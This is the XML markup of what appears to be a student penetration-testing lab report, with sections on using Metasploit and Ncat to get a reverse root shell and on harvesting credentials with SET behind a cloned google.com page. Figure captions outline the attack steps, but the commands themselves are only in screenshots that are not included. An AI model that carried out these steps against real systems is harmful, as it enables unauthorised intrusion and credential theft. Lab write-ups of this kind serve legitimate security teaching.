        <w:tab/>
        <w:t xml:space="preserve"> Lab Results</w:t>
      </w:r>
      <w:r w:rsidR="003F6D6E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00341037" w:rsidRPr="00341037">
        <w:t>Using Ncat as a Trojan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5B22B441" w14:textId="67D9E01E" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037">
      <w:r w:rsidRPr="00341037">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C77D822" wp14:editId="54C4FD26">
            <wp:extent cx="5553075" cy="3791585"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2091314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31486" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5553075" cy="3791585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C5236B" w14:textId="34ADC10E" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037">
      <w:r>
        <w:t>Figure 1.0 – Start Metasploit on attackers’ console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A42EAF8" w14:textId="77777777" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037"/>
    <w:p w14:paraId="33085FC8" w14:textId="5FC4EF6D" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037">
      <w:r w:rsidRPr="00341037">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2122116D" wp14:editId="0A56C79D">
            <wp:extent cx="5467350" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1059813450"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813450" name="Picture 1" descr="A computer screen with text on it&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5467350" cy="1363980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7729D2" w14:textId="35E558CA" w:rsidR="00E320B6" w:rsidRDefault="00E320B6" w:rsidP="00341037">
      <w:r>
        <w:t>Figure 1.1 – Load a reverse TCP payload exploit to be used in our exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36866413" w14:textId="77777777" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037"/>
    <w:p w14:paraId="6800546D" w14:textId="5825F253" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037">
      <w:r w:rsidRPr="00341037">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42CE4693" wp14:editId="79E25C06">
            <wp:extent cx="5867400" cy="1369695"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1813114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114672" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5867400" cy="1369695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D531D03" w14:textId="2BBA72F6" w:rsidR="00E320B6" w:rsidRDefault="00E320B6" w:rsidP="00341037">
      <w:r>
        <w:t>Figure 1.2 - Set the remote host as skillsetlocal.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264165A6" w14:textId="77777777" w:rsidR="00E320B6" w:rsidRDefault="00E320B6" w:rsidP="00341037"/>
    <w:p w14:paraId="74D28142" w14:textId="77777777" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037"/>
    <w:p w14:paraId="3890212B" w14:textId="4068137D" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037">
      <w:r w:rsidRPr="00341037">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73C06C49" wp14:editId="2E09D664">
            <wp:extent cx="6067425" cy="1129665"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="660299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299551" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6067425" cy="1129665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747A6B7" w14:textId="082DC70E" w:rsidR="00E320B6" w:rsidRDefault="00E320B6" w:rsidP="00341037">
      <w:r>
        <w:t>Figure 1.3 – Set the target URI for script for our vulnerability trojan script to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AB89D3" w14:textId="77777777" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037"/>
    <w:p w14:paraId="0105124E" w14:textId="18A29FAC" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037">
      <w:r w:rsidRPr="00341037">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31D44E0C" wp14:editId="21FA52B4">
            <wp:extent cx="6067425" cy="2621280"/>
            <wp:effectExtent l="0" t="0" r="9525" b="7620"/>
            <wp:docPr id="578432041" name="Picture 1" descr="A computer screen with white text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432041" name="Picture 1" descr="A computer screen with white text and green text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6067425" cy="2621280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09251271" w14:textId="19FB00B7" w:rsidR="00E320B6" w:rsidRDefault="00E320B6" w:rsidP="00341037">
      <w:r>
        <w:t xml:space="preserve">Figure 1.4 – Run the setup exploit.  After success, upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631E07C" w14:textId="77777777" w:rsidR="00E320B6" w:rsidRDefault="00E320B6" w:rsidP="00341037"/>
    <w:p w14:paraId="0FE727A8" w14:textId="77777777" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037"/>
    <w:p w14:paraId="56D82FF7" w14:textId="1E290840" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037">
      <w:r w:rsidRPr="00341037">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="272E52A6" wp14:editId="7A4C54BE">
            <wp:extent cx="6143625" cy="3305810"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8890"/>
            <wp:docPr id="998864061" name="Picture 1" descr="A computer screen with white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864061" name="Picture 1" descr="A computer screen with white text and numbers&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6143625" cy="3305810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C2982" w14:textId="3C37827F" w:rsidR="00220F2D" w:rsidRDefault="00220F2D" w:rsidP="00341037">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 1.5 – After execution of uploading </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, start a shell session and switch to user root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB6DE35" w14:textId="77777777" w:rsidR="00341037" w:rsidRDefault="00341037" w:rsidP="00341037"/>
    <w:p w14:paraId="752B9785" w14:textId="25498C8F" w:rsidR="00341037" w:rsidRDefault="00E320B6" w:rsidP="00341037">
      <w:r w:rsidRPr="00E320B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11A21CD3" wp14:editId="13387A16">
            <wp:extent cx="4810796" cy="1448002"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="674473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73886" name="Picture 1" descr="A black screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4810796" cy="1448002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BEF75C" w14:textId="2D21C524" w:rsidR="00220F2D" w:rsidRDefault="00220F2D" w:rsidP="00341037">
      <w:r>
        <w:t xml:space="preserve">Figure 1.6 – Listen with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on port 999 for the shell session.  Terminate channel after setting up listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F129BB1" w14:textId="77777777" w:rsidR="00E320B6" w:rsidRDefault="00E320B6" w:rsidP="00341037"/>
    <w:p w14:paraId="12E80096" w14:textId="4AB1AFC9" w:rsidR="00E320B6" w:rsidRDefault="00E320B6" w:rsidP="00341037">
      <w:r w:rsidRPr="00E320B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DB18FAF" wp14:editId="3FE1E200">
            <wp:extent cx="5048955" cy="1467055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199781742" name="Picture 1"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1742" name="Picture 1" descr="A screen shot of a video game&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5048955" cy="1467055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F18DA9E" w14:textId="1EEBB081" w:rsidR="00220F2D" w:rsidRPr="00341037" w:rsidRDefault="00220F2D" w:rsidP="00341037">
      <w:r>
        <w:t xml:space="preserve">Figure 1.7 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> into open port listener, we have successfully started a session with a reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082BBF96" w14:textId="109EC0C2" w:rsidR="00651960" w:rsidRDefault="00651960" w:rsidP="00651960">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Toc145876477"/>
      <w:r w:rsidR="00AD5F38">
        <w:lastRenderedPageBreak/>
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Technical Review – </w:t>
      </w:r>
      <w:r w:rsidR="00341037" w:rsidRPr="00341037">
        <w:t>Using Ncat as a Trojan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7CCFC7EA" w14:textId="77777777" w:rsidR="00651960" w:rsidRDefault="00651960" w:rsidP="00341037">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42853EFF" w14:textId="519C8DFE" w:rsidR="00150D6C" w:rsidRPr="00651960" w:rsidRDefault="00150D6C" w:rsidP="00DE39BA">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:r w:rsidR="00DE39BA">
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instance, the usage of multiple tools was introduced.  Through the basic attack method of using Metasploit reverse shell exploits, the attack had the ability to then upload malicious scripts using </w:t>
      </w:r>
      <w:r w:rsidR="00DE39BA">
        <w:t>pre-written shell scripts.  This script allowed us to then use Ncat to create an open port listener, a trojan back door entrance, in which attackers can then use to create a reverse shell session.  Once on this reverse shell back door entrance, attackers can then escalate and further compromise their target and network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1749F449" w14:textId="11619D09" w:rsidR="0058304D" w:rsidRDefault="0058304D" w:rsidP="0003243F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB5EC59" w14:textId="77777777" w:rsidR="0058304D" w:rsidRDefault="0058304D" w:rsidP="0003243F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D56EC4F" w14:textId="21730E93" w:rsidR="003F6D6E" w:rsidRDefault="00D85544" w:rsidP="00D85544">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc145876478"/>
      <w:r>
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidR="00AD5F38">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="003F6D6E">
        <w:t xml:space="preserve">Introduction – </w:t>
      </w:r>
      <w:r w:rsidR="00AD5F38" w:rsidRPr="00AD5F38">
        <w:t>Credential Harvesting with SET</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="3FC8BDD1" w14:textId="477C622F" w:rsidR="008A2E10" w:rsidRPr="008A2E10" w:rsidRDefault="008A2E10" w:rsidP="008A2E10">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this attack, the focus is on using a man in the middle esq attack that emulates a real web domain as legit while feeding the data sent by the victim in plain text and unencrypted to the attacker.  This attack relies on creating a legit landing zone of popular sites, such as google.com, so the victim trusts the site.  On the other side, the attackers are creating a man-in-the-middle attack.  From this attack, attackers can either lead the victim to more malicious domains or send their information to the actual site, leaving them unaware of the attack that just occurred. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA7E72" w14:textId="77777777" w:rsidR="0058304D" w:rsidRDefault="0058304D" w:rsidP="0003243F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4BF9C6" w14:textId="5287BD2C" w:rsidR="00341037" w:rsidRDefault="003F6D6E" w:rsidP="006F1887">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="_Toc145876479"/>
      <w:r w:rsidR="00D85544">
        <w:lastRenderedPageBreak/>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="006F1887">
        <w:tab/>
        <w:t xml:space="preserve"> Lab Results – </w:t>
      </w:r>
      <w:r w:rsidR="00AD5F38" w:rsidRPr="00AD5F38">
        <w:t>Credential Harvesting with SET</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="6CE7B999" w14:textId="2932FC94" w:rsidR="003E080B" w:rsidRDefault="003E080B" w:rsidP="003E080B"/>
    <w:p w14:paraId="3BAB42D1" w14:textId="77777777" w:rsidR="00B738DE" w:rsidRDefault="00B738DE" w:rsidP="003E080B"/>
    <w:p w14:paraId="0CF72257" w14:textId="2BA7C102" w:rsidR="00B738DE" w:rsidRDefault="00B738DE" w:rsidP="003E080B">
      <w:r w:rsidRPr="00B738DE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DA44703" wp14:editId="02451D67">
            <wp:extent cx="5134692" cy="1943371"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1232874208" name="Picture 1" descr="A computer screen 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74208" name="Picture 1" descr="A computer screen shot of a black and white screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5134692" cy="1943371"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9413B" w14:textId="77777777" w:rsidR="00E07720" w:rsidRDefault="00E07720" w:rsidP="00E07720">
      <w:r>
        <w:t xml:space="preserve">Figure 2.0 – Change the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hosts file to resolve home to google.com and google.com to home address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C8AEDD" w14:textId="77777777" w:rsidR="00E07720" w:rsidRDefault="00E07720" w:rsidP="003E080B"/>
    <w:p w14:paraId="13653EC4" w14:textId="77777777" w:rsidR="00B738DE" w:rsidRDefault="00B738DE" w:rsidP="003E080B"/>
    <w:p w14:paraId="2C18B82A" w14:textId="5D71EAD2" w:rsidR="00B738DE" w:rsidRDefault="00B738DE" w:rsidP="003E080B">
      <w:r w:rsidRPr="00B738DE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="764A6476" wp14:editId="1EFD0279">
            <wp:extent cx="6201640" cy="1695687"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101065615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656159" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6201640" cy="1695687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE7BB24" w14:textId="49EE6E1C" w:rsidR="00E07720" w:rsidRDefault="00E07720" w:rsidP="003E080B">
      <w:r>
        <w:t>Figure 2.1 – Ping google.com to verify it is resolving the host of home (127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FDD0C1" w14:textId="77777777" w:rsidR="00B738DE" w:rsidRDefault="00B738DE" w:rsidP="003E080B"/>
    <w:p w14:paraId="22AB6363" w14:textId="222516FE" w:rsidR="00B738DE" w:rsidRDefault="00B738DE" w:rsidP="003E080B">
      <w:r w:rsidRPr="00B738DE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03EFCE44" wp14:editId="21C8BED4">
            <wp:extent cx="5229955" cy="4220164"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="6728598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59805" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5229955" cy="4220164"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8574E1" w14:textId="6A6C8E63" w:rsidR="00E07720" w:rsidRDefault="00E07720" w:rsidP="003E080B">
      <w:r>
        <w:t>Figure 2.2 – Load the SET tool to prepare our social engineering attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBB280C" w14:textId="77777777" w:rsidR="00B738DE" w:rsidRDefault="00B738DE" w:rsidP="003E080B"/>
    <w:p w14:paraId="12370D3D" w14:textId="0B6A6796" w:rsidR="00B738DE" w:rsidRDefault="00B738DE" w:rsidP="003E080B">
      <w:r w:rsidRPr="00B738DE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C14A928" wp14:editId="0FAA17D6">
            <wp:extent cx="4077269" cy="4029637"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13382390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39049" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4077269" cy="4029637"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1A43E" w14:textId="1F03D0AB" w:rsidR="00B738DE" w:rsidRDefault="00E07720" w:rsidP="00E07720">
      <w:r>
        <w:t>Figure 2.3 – Select a credential harvester attack method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0271BBF3" w14:textId="77777777" w:rsidR="00E07720" w:rsidRDefault="00E07720" w:rsidP="00E07720"/>
    <w:p w14:paraId="3C0F2924" w14:textId="69B4CA70" w:rsidR="00B738DE" w:rsidRDefault="00954A37" w:rsidP="003E080B">
      <w:r w:rsidRPr="00954A37">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C70E57" wp14:editId="0A7E0FC7">
            <wp:extent cx="6487430" cy="4753638"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="16360988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98802" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6487430" cy="4753638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EBD4CD" w14:textId="246B6131" w:rsidR="00954A37" w:rsidRDefault="00E07720" w:rsidP="003E080B">
      <w:r>
        <w:t xml:space="preserve">Figure 2.4 – Select using a web template to use as our front for the credential </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>harvester</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2AC50842" w14:textId="77777777" w:rsidR="00E07720" w:rsidRDefault="00E07720" w:rsidP="003E080B"/>
    <w:p w14:paraId="2F0486BB" w14:textId="3CC8B6A8" w:rsidR="00954A37" w:rsidRDefault="00954A37" w:rsidP="003E080B">
      <w:r w:rsidRPr="00954A37">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B1410F0" wp14:editId="2F3CC54E">
            <wp:extent cx="6200775" cy="872490"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:docPr id="1600967647"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967647" name="Picture 1" descr="A black background with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6200775" cy="872490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A7E3D" w14:textId="08808133" w:rsidR="00E07720" w:rsidRDefault="00E07720" w:rsidP="003E080B">
      <w:r>
        <w:t>Figure 2.5 – Make our home address the post back to feed the harvester information too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060905E1" w14:textId="77777777" w:rsidR="00905069" w:rsidRDefault="00905069" w:rsidP="003E080B"/>
    <w:p w14:paraId="7DC550BB" w14:textId="69B6C959" w:rsidR="00905069" w:rsidRDefault="00905069" w:rsidP="003E080B">
      <w:r w:rsidRPr="00905069">
